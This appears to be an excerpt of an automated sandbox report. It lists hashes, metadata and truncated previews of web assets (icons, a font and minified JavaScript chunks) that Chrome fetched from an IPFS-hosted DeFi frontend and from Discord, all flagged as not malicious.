                                                                                                                                                                                                                                                  Entropy (8bit):6.047618250834545
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:tg7mZhXeov6Vn6OPbhEQhUrZ6/947vjWLfCcEoQ+6Ny1QXLR1KXkVmks232YvvO0:QmZV6VdhEFkl4hn3XXKXkVzGYvvy0xfV
                                                                                                                                                                                                                                                  MD5:19B416D849CAB8E380747A535A5FFDC6
                                                                                                                                                                                                                                                  SHA1:DEAE4F450EBAE10FB8609D1E70F5AF9201D743F8
                                                                                                                                                                                                                                                  SHA-256:1BACF67CF153ED11DF37509111E853B92C09E2F15AE25D3052A3B550E87EE7C8
                                                                                                                                                                                                                                                  SHA-512:CE8383CA8F9213752D0CCC1CBCDF736C704CB1CFF86457B6D872A4FF67124651FA99AA25E3D07167FACE1077BFCA662D667C35115467404F0C3A9F5CACAC83AF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/networks/ethereum.svg
                                                                                                                                                                                                                                                  Preview:<svg width="24" height="24" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#b" transform="scale(.00781)"/></pattern><image id="b" width="128" height="128" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAYAAADDPmHLAAARKElEQVR4Ae1d25MVxRnfsiyfQlVe4pOW+SOsSl7iQ3xK+T/EqjOrIRgTk4gxamZmYcFdUAGRmyKieFlcYFVEWVdAkYsYvKEhSoJYUauge86eZZc9sLtwOvXrs8POmTPT3XM7070yVafOXHt6vt+vv758X3/d1TUPt/vc2k/vXuL9otv1ftvteMsqDt1escneikMOV2xyouKQMxWbeBWHTvEf3+fncA337MUzeBZpIC2kOQ9FZf4nLXLZT+7qIb+xHLrSsunBikPOVWzCCvk55BzegXfhnXi3+RI07Atcl93Q7Xq/tlyv17LJEcuhM4WArUAivJvnwfV6kSfkzTBxmpPdbrf6S8sh6yyHVssCXPZe5A15RF7NkazGOV3o1n5uueQRy6Ffy4Sv23XkGXnHN2gsYj2zVnHprZZDhyo2begGbPL80Ab/Fpfeqqe0NcpV9xLyK8shw8mFXFCjT6EdkCSv+DZ8o0Yi1yMrVo93O2/B5yzwJOB08l7ek+jxbtdD+iXmotut3lRxyGAnha/VuxwyCBmUCEE5r3Zddr3l0vsth0xoBUgJGggygCwgk3LQ6PBb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29934), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29934
                                                                                                                                                                                                                                                  Entropy (8bit):5.548164506514609
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:eyPkWVecfOr8Bm4ehCsyFMc1mrl21RMJLinho:zeTrIehCEc+ooz
                                                                                                                                                                                                                                                  MD5:BD8AB992C5A41B157AF110BC463F3900
                                                                                                                                                                                                                                                  SHA1:6EE8EBA24A412F41C536AB6C2B640C004BA2CFC6
                                                                                                                                                                                                                                                  SHA-256:C9ADB307C1A0ED98C19FE20D9BD667B0E968DEBAE2CA6DE4D60FE4988C2F2F6B
                                                                                                                                                                                                                                                  SHA-512:E67E77AA40AB883A1CAA8B3A55B87DD378B4D8785BDCC722267C737949DC42D97BC8AE2E782DF57CD4ADB2190594998F9C62D0AD988E48A44C984B1FDFB0893A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/425.555cf6c72ac0d764.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[425],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 45868, version 3.131
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):45868
                                                                                                                                                                                                                                                  Entropy (8bit):7.995149406203617
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:7T3lyZzszaXGZG8vNh620Ph+EdGcNo3ITx62hw4oZkha6UK5+Ubp7tSSC5Zn/pf8:7TVyZwzQZ8vNd0Ph9/Nuo6GPUK5+UbJz
                                                                                                                                                                                                                                                  MD5:D295C40AF6FCA08F8E0EB5425351F431
                                                                                                                                                                                                                                                  SHA1:1D246A1E54B3A1F2428883D8C911AF73EDDFFCA6
                                                                                                                                                                                                                                                  SHA-256:5D225B25D66B30563A00F395476ED701130D3F749620A63531CEA09FC537164E
                                                                                                                                                                                                                                                  SHA-512:9C9F23CB775244EB10F83F964B36224AD2CD5152CFA5AB82928F68ED1CB49BE4156F887CC40A857B72EFD0833014E4366BF136689A717DD58828A1B195ED486E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/8bd8143eff37936894aa.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......,......................................x......\.`..X..@........T..@.6.$........ ..a..K..x[T...5...(..V.M..m...{.9....s49..ybj.......>}.m......O&r.%.T..Q....5.43.yD..u.%.S.w^.B....*1p|b2..g...Wuq.B...2.e~.3..>.I..TLP..c.....c$8..Tle.......U:6Wl.=.....U..V............W .iH8..7...r..~.eo.A......8..T.`.o........&.L".o.E..v....+B...N"].p...d [ ..Z_.w....s....L......,.E..=+.y3l...-......K..5..6....~.r.f..5D..U|W.$...n.f.(6..j.|....B...]..-....]"..5..[g.B..[s..% .[/.D..m.../...U}d....T.<....b......|..Fc..K..2Y..pb}m\..p.....:.hn.6$*F..F..1"E*.h+......&5r..(...||g.N\T.....I.4KD[U.^V..y.{.n%j3.k.....E%...@...<(j.......O....K...0 L...QD.......Q.xzQ...[Y..".1F..1j0F...C.."e.i.wN/<.(...k.".++....`........UW.K3.......}...u+I%........y.o.v.ym....D|f2.cWr@...l;.L.Y..~.&..g.... b[......j..I.i.H.{4n....s.y.`_v7..,...Z...".S.t.J3.[...t+.'b..F.6...Q`.!..B...N.0L.,<.:>......:@.SP..9@2.....rvr0.oJ,.5..p'..V.Js@.....L..%[.%#=.y3.|..V.fa.m;).....G....._
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2750
                                                                                                                                                                                                                                                  Entropy (8bit):5.460366645013334
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:F0fzk02vWrc1AKTMSTEcr9rTOLBsmPBo/6XgpdgwrIsi5dEk+MQwq2kWkGRv6hvr:ek02hfMXcKs+lXyisi5CkiPrWk+Ch/Ew
                                                                                                                                                                                                                                                  MD5:390A7AB1F964AA8CB1B87DD13732C3BC
                                                                                                                                                                                                                                                  SHA1:CEA52AC6FA0CDF49A18D51C8CD8A5C4FB52DEAC9
                                                                                                                                                                                                                                                  SHA-256:BEDD382930BA4E10DFA902BF833195911F82E754223441446E9D7CC45B01110F
                                                                                                                                                                                                                                                  SHA-512:4B799488E35C5B933E9B1BA6AB335E2EAD6D625D3DC1FEC19DD80F48B9B7996171BEC24513095F3F1BAA9C8B7675FA4E527B763AEED26B69273BF2DCED014D3F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/29a63f12209c956d9204.js
                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var t={137920:function(t,r,n){var e,i;n.d(r,{J:function(){return u},z:function(){return e}}),(i=e||(e={}))[i.NONE=0]="NONE",i[i.SOCIAL=1]="SOCIAL",i[i.CASUAL=2]="CASUAL",i[i.COMPETITIVE=3]="COMPETITIVE",i[i.CREATIVE=4]="CREATIVE",i[i.VERY_HARDCORE=5]="VERY_HARDCORE";let u={0:"NONE",4:"NONE",1:"CASUAL",2:"CASUAL",3:"COMPETITIVE",5:"COMPETITIVE"}},945124:function(t,r,n){n.d(r,{y:function(){return i}});var e=n(137920);function i(t,r){let n=0;return null!=r.games&&(n+=2*r.games.filter(r=>t.games.includes(r)).length),null!=r.playstyle&&(r.playstyle===t.playstyle?n+=2:e.J[t.playstyle]===e.J[r.playstyle]&&(n+=1)),null!=r.traits&&(n+=2*Array.from(r.traits).filter(r=>t.traits.includes(r)).length),n}},866762:function(t,r,n){n(312677);var e=n(945124);self.addEventListener("message",t=>{var r,n;let{data:{unsortedClans:i,id:u,criteria:o}}=t;let a=(r=i,n=o,r.map(t=>({...t,affinity:(0,e.y)(t,n)})).sort((t,r)=>{var i,u;let o=null!==(i=r.affinity)&&void 0!==i?i:(0,e.y)(r,n);return o-
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16085), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16085
                                                                                                                                                                                                                                                  Entropy (8bit):5.328541584389771
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:EfoHj7Xoup0SgduzGt0JL2F5nbAtuOR0eT2RL69e:m27gduySYF5nbxZ69e
                                                                                                                                                                                                                                                  MD5:0C18A13DD5CC5991EE3AD74282D6D9E7
                                                                                                                                                                                                                                                  SHA1:75E30ED288D2F6FE75A7AD6F3A7AE007BAE01AE3
                                                                                                                                                                                                                                                  SHA-256:F2DDEEA7B0DC7C8FDD5F5C3F4EE5B0E0C4FB8A70E17C5AC0E129885B418DC6D0
                                                                                                                                                                                                                                                  SHA-512:091D98673C0F154C9FD4573823331EA4D4BFA0D34897FD9CF9836B3B032042289EE5AB44DABD22F8FF73EA03CA05ADD0292ED7531540C790239B6746342D05A8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{68682:function(e,n,t){t.d(n,{MB:function(){return A},ET:function(){return S},n2:function(){return k}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(49338),u=t(78371),d=t(57609),p=t(97563),x=t(41024),f=t(72667),j=t(59499),y=t(49501),v=t(92391),m=t(85893);function b(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function h(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?b(Object(t),!0).forEach((function(n){(0,j.Z)(e,n,t[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):b(Object(t)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))}))}return e}var g={aEthLidoWETH:{tokenIconSymbol:"WETH",symbol:"aWETH",a
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):449
                                                                                                                                                                                                                                                  Entropy (8bit):5.193136170719881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnr0Qol8GcAumc4slZ8CirSgPAYlO9fPcpZGKYSQkGdQqncdnGXmuQoQqiK8AcAL:tr0dmGtuBcPRlgfPaGHsdGXNdQQ88L
                                                                                                                                                                                                                                                  MD5:1F4B4F940ACA49012D8D6D27EC05EEB7
                                                                                                                                                                                                                                                  SHA1:08207179BCAFD60964874A09B6428C8915AEB76D
                                                                                                                                                                                                                                                  SHA-256:E0C660872D4FF92F71591408DB5BE729E4E863907CE6906BE0A794A83660FEC8
                                                                                                                                                                                                                                                  SHA-512:EAADD8B66226DEA34055C924E5F3E3E7EFC7CF61030690807138AD46C200E2E2BD63EB6AFE08ED78431B8DF3BC68853E95AD409B5397D9610A9CFF02C68B72B1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.627Zm0-6.5H7.777V4.623H21V6.25Z" fill="#fff"/></g><defs><clipPath id="a"><rect y="3" width="20" height="14" rx="2" fill="#fff"/></clipPath></defs></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14192), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14192
                                                                                                                                                                                                                                                  Entropy (8bit):5.486892248452224
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:OmvgZ4Ybcnri8/C1W7WbafAj4/1LBzVIx:Bg+YomGCz0/9BzV+
                                                                                                                                                                                                                                                  MD5:D564BEBDB37752D4783DD0F7D617163F
                                                                                                                                                                                                                                                  SHA1:C150296E1AA4068BD588541ADB4EF95363FD9EED
                                                                                                                                                                                                                                                  SHA-256:B707DEFEB00A49E6CE1733111BE7D61E6C189CD74A082651D4876C9A5BAE2839
                                                                                                                                                                                                                                                  SHA-512:E84952CA5CDB46EF597072201F73BE54E6B6A32F70EEA54ECF8D5C0F3ABF014AB2580F103AE648D6BE3C00F5BA40F321562FF853DB658B551B052A6405F379EF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:function(){return L},Pu:function(){return B}});var t=r(59499),i=r(4730),a=r(49501),o=r(80227),s=r(81645),c=r(30120),l=r(29630),d=r(91655),x=r(22841),u=r(54181),p=r(56371),j=(r(67294),r(44749)),h=r(92391),v=r(29946),f=r(96875),m=r(12349),b=r(41024),g=r(72667),y=r(35643),O=r(85893),A=["description","value","futureValue","numberPrefix","iconSymbol","loading"];function Z(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function P(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?Z(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwn
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):130002
                                                                                                                                                                                                                                                  Entropy (8bit):5.26274534357211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:M3hOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:M3hOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                                                                                                                  MD5:8CEAC1A0789024027E37CCA07BEBAAD2
                                                                                                                                                                                                                                                  SHA1:6A80812D9E27ECC9B58466D027409F8A0668E2F4
                                                                                                                                                                                                                                                  SHA-256:745834316128A9605DB352A4146DFB81CFD209FA037D3256277E2BC9D12B0F44
                                                                                                                                                                                                                                                  SHA-512:A99D9DCA1C31AF0C2FE4E8B178B79B13DFA9F2A49D4776F1A9C4D008A6ACD4CD1C8AFF1B8D04D37AF9331E15F786D6A43186C45D2CD6FB3C626F92E1E597138B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):6321
                                                                                                                                                                                                                                                  Entropy (8bit):6.047618250834545
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:tg7mZhXeov6Vn6OPbhEQhUrZ6/947vjWLfCcEoQ+6Ny1QXLR1KXkVmks232YvvO0:QmZV6VdhEFkl4hn3XXKXkVzGYvvy0xfV
                                                                                                                                                                                                                                                  MD5:19B416D849CAB8E380747A535A5FFDC6
                                                                                                                                                                                                                                                  SHA1:DEAE4F450EBAE10FB8609D1E70F5AF9201D743F8
                                                                                                                                                                                                                                                  SHA-256:1BACF67CF153ED11DF37509111E853B92C09E2F15AE25D3052A3B550E87EE7C8
                                                                                                                                                                                                                                                  SHA-512:CE8383CA8F9213752D0CCC1CBCDF736C704CB1CFF86457B6D872A4FF67124651FA99AA25E3D07167FACE1077BFCA662D667C35115467404F0C3A9F5CACAC83AF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="24" height="24" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#b" transform="scale(.00781)"/></pattern><image id="b" width="128" height="128" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAYAAADDPmHLAAARKElEQVR4Ae1d25MVxRnfsiyfQlVe4pOW+SOsSl7iQ3xK+T/EqjOrIRgTk4gxamZmYcFdUAGRmyKieFlcYFVEWVdAkYsYvKEhSoJYUauge86eZZc9sLtwOvXrs8POmTPT3XM7070yVafOXHt6vt+vv758X3/d1TUPt/vc2k/vXuL9otv1ftvteMsqDt1escneikMOV2xyouKQMxWbeBWHTvEf3+fncA337MUzeBZpIC2kOQ9FZf4nLXLZT+7qIb+xHLrSsunBikPOVWzCCvk55BzegXfhnXi3+RI07Atcl93Q7Xq/tlyv17LJEcuhM4WArUAivJvnwfV6kSfkzTBxmpPdbrf6S8sh6yyHVssCXPZe5A15RF7NkazGOV3o1n5uueQRy6Ffy4Sv23XkGXnHN2gsYj2zVnHprZZDhyo2begGbPL80Ab/Fpfeqqe0NcpV9xLyK8shw8mFXFCjT6EdkCSv+DZ8o0Yi1yMrVo93O2/B5yzwJOB08l7ek+jxbtdD+iXmotut3lRxyGAnha/VuxwyCBmUCEE5r3Zddr3l0vsth0xoBUgJGggygCwgk3LQ6PBb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):24565
                                                                                                                                                                                                                                                  Entropy (8bit):6.000976601202208
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                                                                                                                                                                                                  MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                                                                                                                                                                                                  SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                                                                                                                                                                                                  SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                                                                                                                                                                                                  SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/favicon.ico
                                                                                                                                                                                                                                                  Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3453
                                                                                                                                                                                                                                                  Entropy (8bit):4.492651407367455
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:1635qoxqZMDwSn6wj6kr0zQw2wrbqlxSv++JmbXv4hP4L+JZiK:sLJD6krqn2mqwKcpSK
                                                                                                                                                                                                                                                  MD5:5B43DB231CBCD2115C8E2A14CC0F5DD9
                                                                                                                                                                                                                                                  SHA1:41C5BC532BCD188ACB28A9C2CCA92A72FC2ACB6D
                                                                                                                                                                                                                                                  SHA-256:5949A0685EF38932D941CA757B2611B260F9DE424664AA9EC051A5EA609B3FF5
                                                                                                                                                                                                                                                  SHA-512:62BAD990A657FF4845EE007B500AFB3FBA4F425397E43CAA457FC04820C837CCB3AB1B0BE380222A56E143EBB84E7437D32523BD55CD98B4B5258D7790FB866D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg"><rect width="256" height="256" rx="128" fill="url(#a)"/><g style="mix-blend-mode:screen" opacity=".8"><path fill-rule="evenodd" clip-rule="evenodd" d="M199.579 190.316v-25.398l-.068-.002-17.48-40.284h-27.969l16.607 39.41h-54.148c-10.441 0-20.295-4.112-27.746-11.578-7.451-7.47-11.56-17.345-11.56-27.806 0-10.461 4.109-20.336 11.56-27.802 7.45-7.466 17.305-11.578 27.746-11.578l51.593-.057-10.925-26.274-40.668.057c-36.128 0-66.837 29.449-66.837 65.654s30.709 65.658 66.837 65.658h83.058Zm-87.449-69.187c7.241 0 13.11-5.882 13.11-13.137 0-7.255-5.869-13.137-13.11-13.137s-13.11 5.882-13.11 13.137c0 7.255 5.869 13.137 13.11 13.137Zm13.11 20.581c0 7.255-5.869 13.137-13.11 13.137s-13.11-5.882-13.11-13.137c0-7.255 5.869-13.137 13.11-13.137s13.11 5.882 13.11 13.137Z" fill="#fff"/><path d="M199.579 164.918h2.5v-2.425l-2.424-.074-.076 2.499Zm0 25.398v2.5h2.5v-2.5h-2.5Zm-.068-25.4-2.294.995.632 1.455 1.5
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):377002
                                                                                                                                                                                                                                                  Entropy (8bit):5.50606385450746
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:qREQG4HoBhbzI8EPQwcuL3svu9phE3x5iHB4LRQCPT6pCxkLNKT4D2nZaHppoBGA:qI4chbzIvcd64LRQCPGekMTg2oHjj3p2
                                                                                                                                                                                                                                                  MD5:95729618476C5EBE1D8A4162BBF8EC53
                                                                                                                                                                                                                                                  SHA1:C63D508F9F2042DD9E05E86DCEC0CA5BA471CDAA
                                                                                                                                                                                                                                                  SHA-256:0E40B5B679B7D8A82F97B931263AC24095073C75ED1683637288B8F52C9B75C5
                                                                                                                                                                                                                                                  SHA-512:DBD1D45EFF279FFF17BE3C0231704FBF6A21832BA547C300B063638B0629F4B97F2EA3B45A06337F5E7F6CCA8B6515A2E98A4782489B3B048AEFE9AA2912DC13
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4700.1016c158c2995fc4.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4700],{56674:function(e,t,r){"use strict";r.d(t,{J:function(){return w},c:function(){return A}});let n=!1,i=!1;const o={debug:1,default:2,info:2,warning:3,error:4,off:5};let s=o.default,a=null;const u=function(){try{const e=[];if(["NFD","NFC","NFKD","NFKC"].forEach((t=>{try{if("test"!=="test".normalize(t))throw new Error("bad normalize")}catch(r){e.push(t)}})),e.length)throw new Error("missing "+e.join(", "));if(String.fromCharCode(233).normalize("NFD")!==String.fromCharCode(101,769))throw new Error("broken implementation")}catch(e){return e.message}return null}();var c,l;!function(e){e.DEBUG="DEBUG",e.INFO="INFO",e.WARNING="WARNING",e.ERROR="ERROR",e.OFF="OFF"}(c||(c={})),function(e){e.UNKNOWN_ERROR="UNKNOWN_ERROR",e.NOT_IMPLEMENTED="NOT_IMPLEMENTED",e.UNSUPPORTED_OPERATION="UNSUPPORTED_OPERATION",e.NETWORK_ERROR="NETWORK_ERROR",e.SERVER_ERROR="SERVER_ERROR",e.TIMEOUT="TIMEOUT",e.BUFFER_OVERRUN="BUFFER_OVERRUN",e.NUMERIC_FAULT="
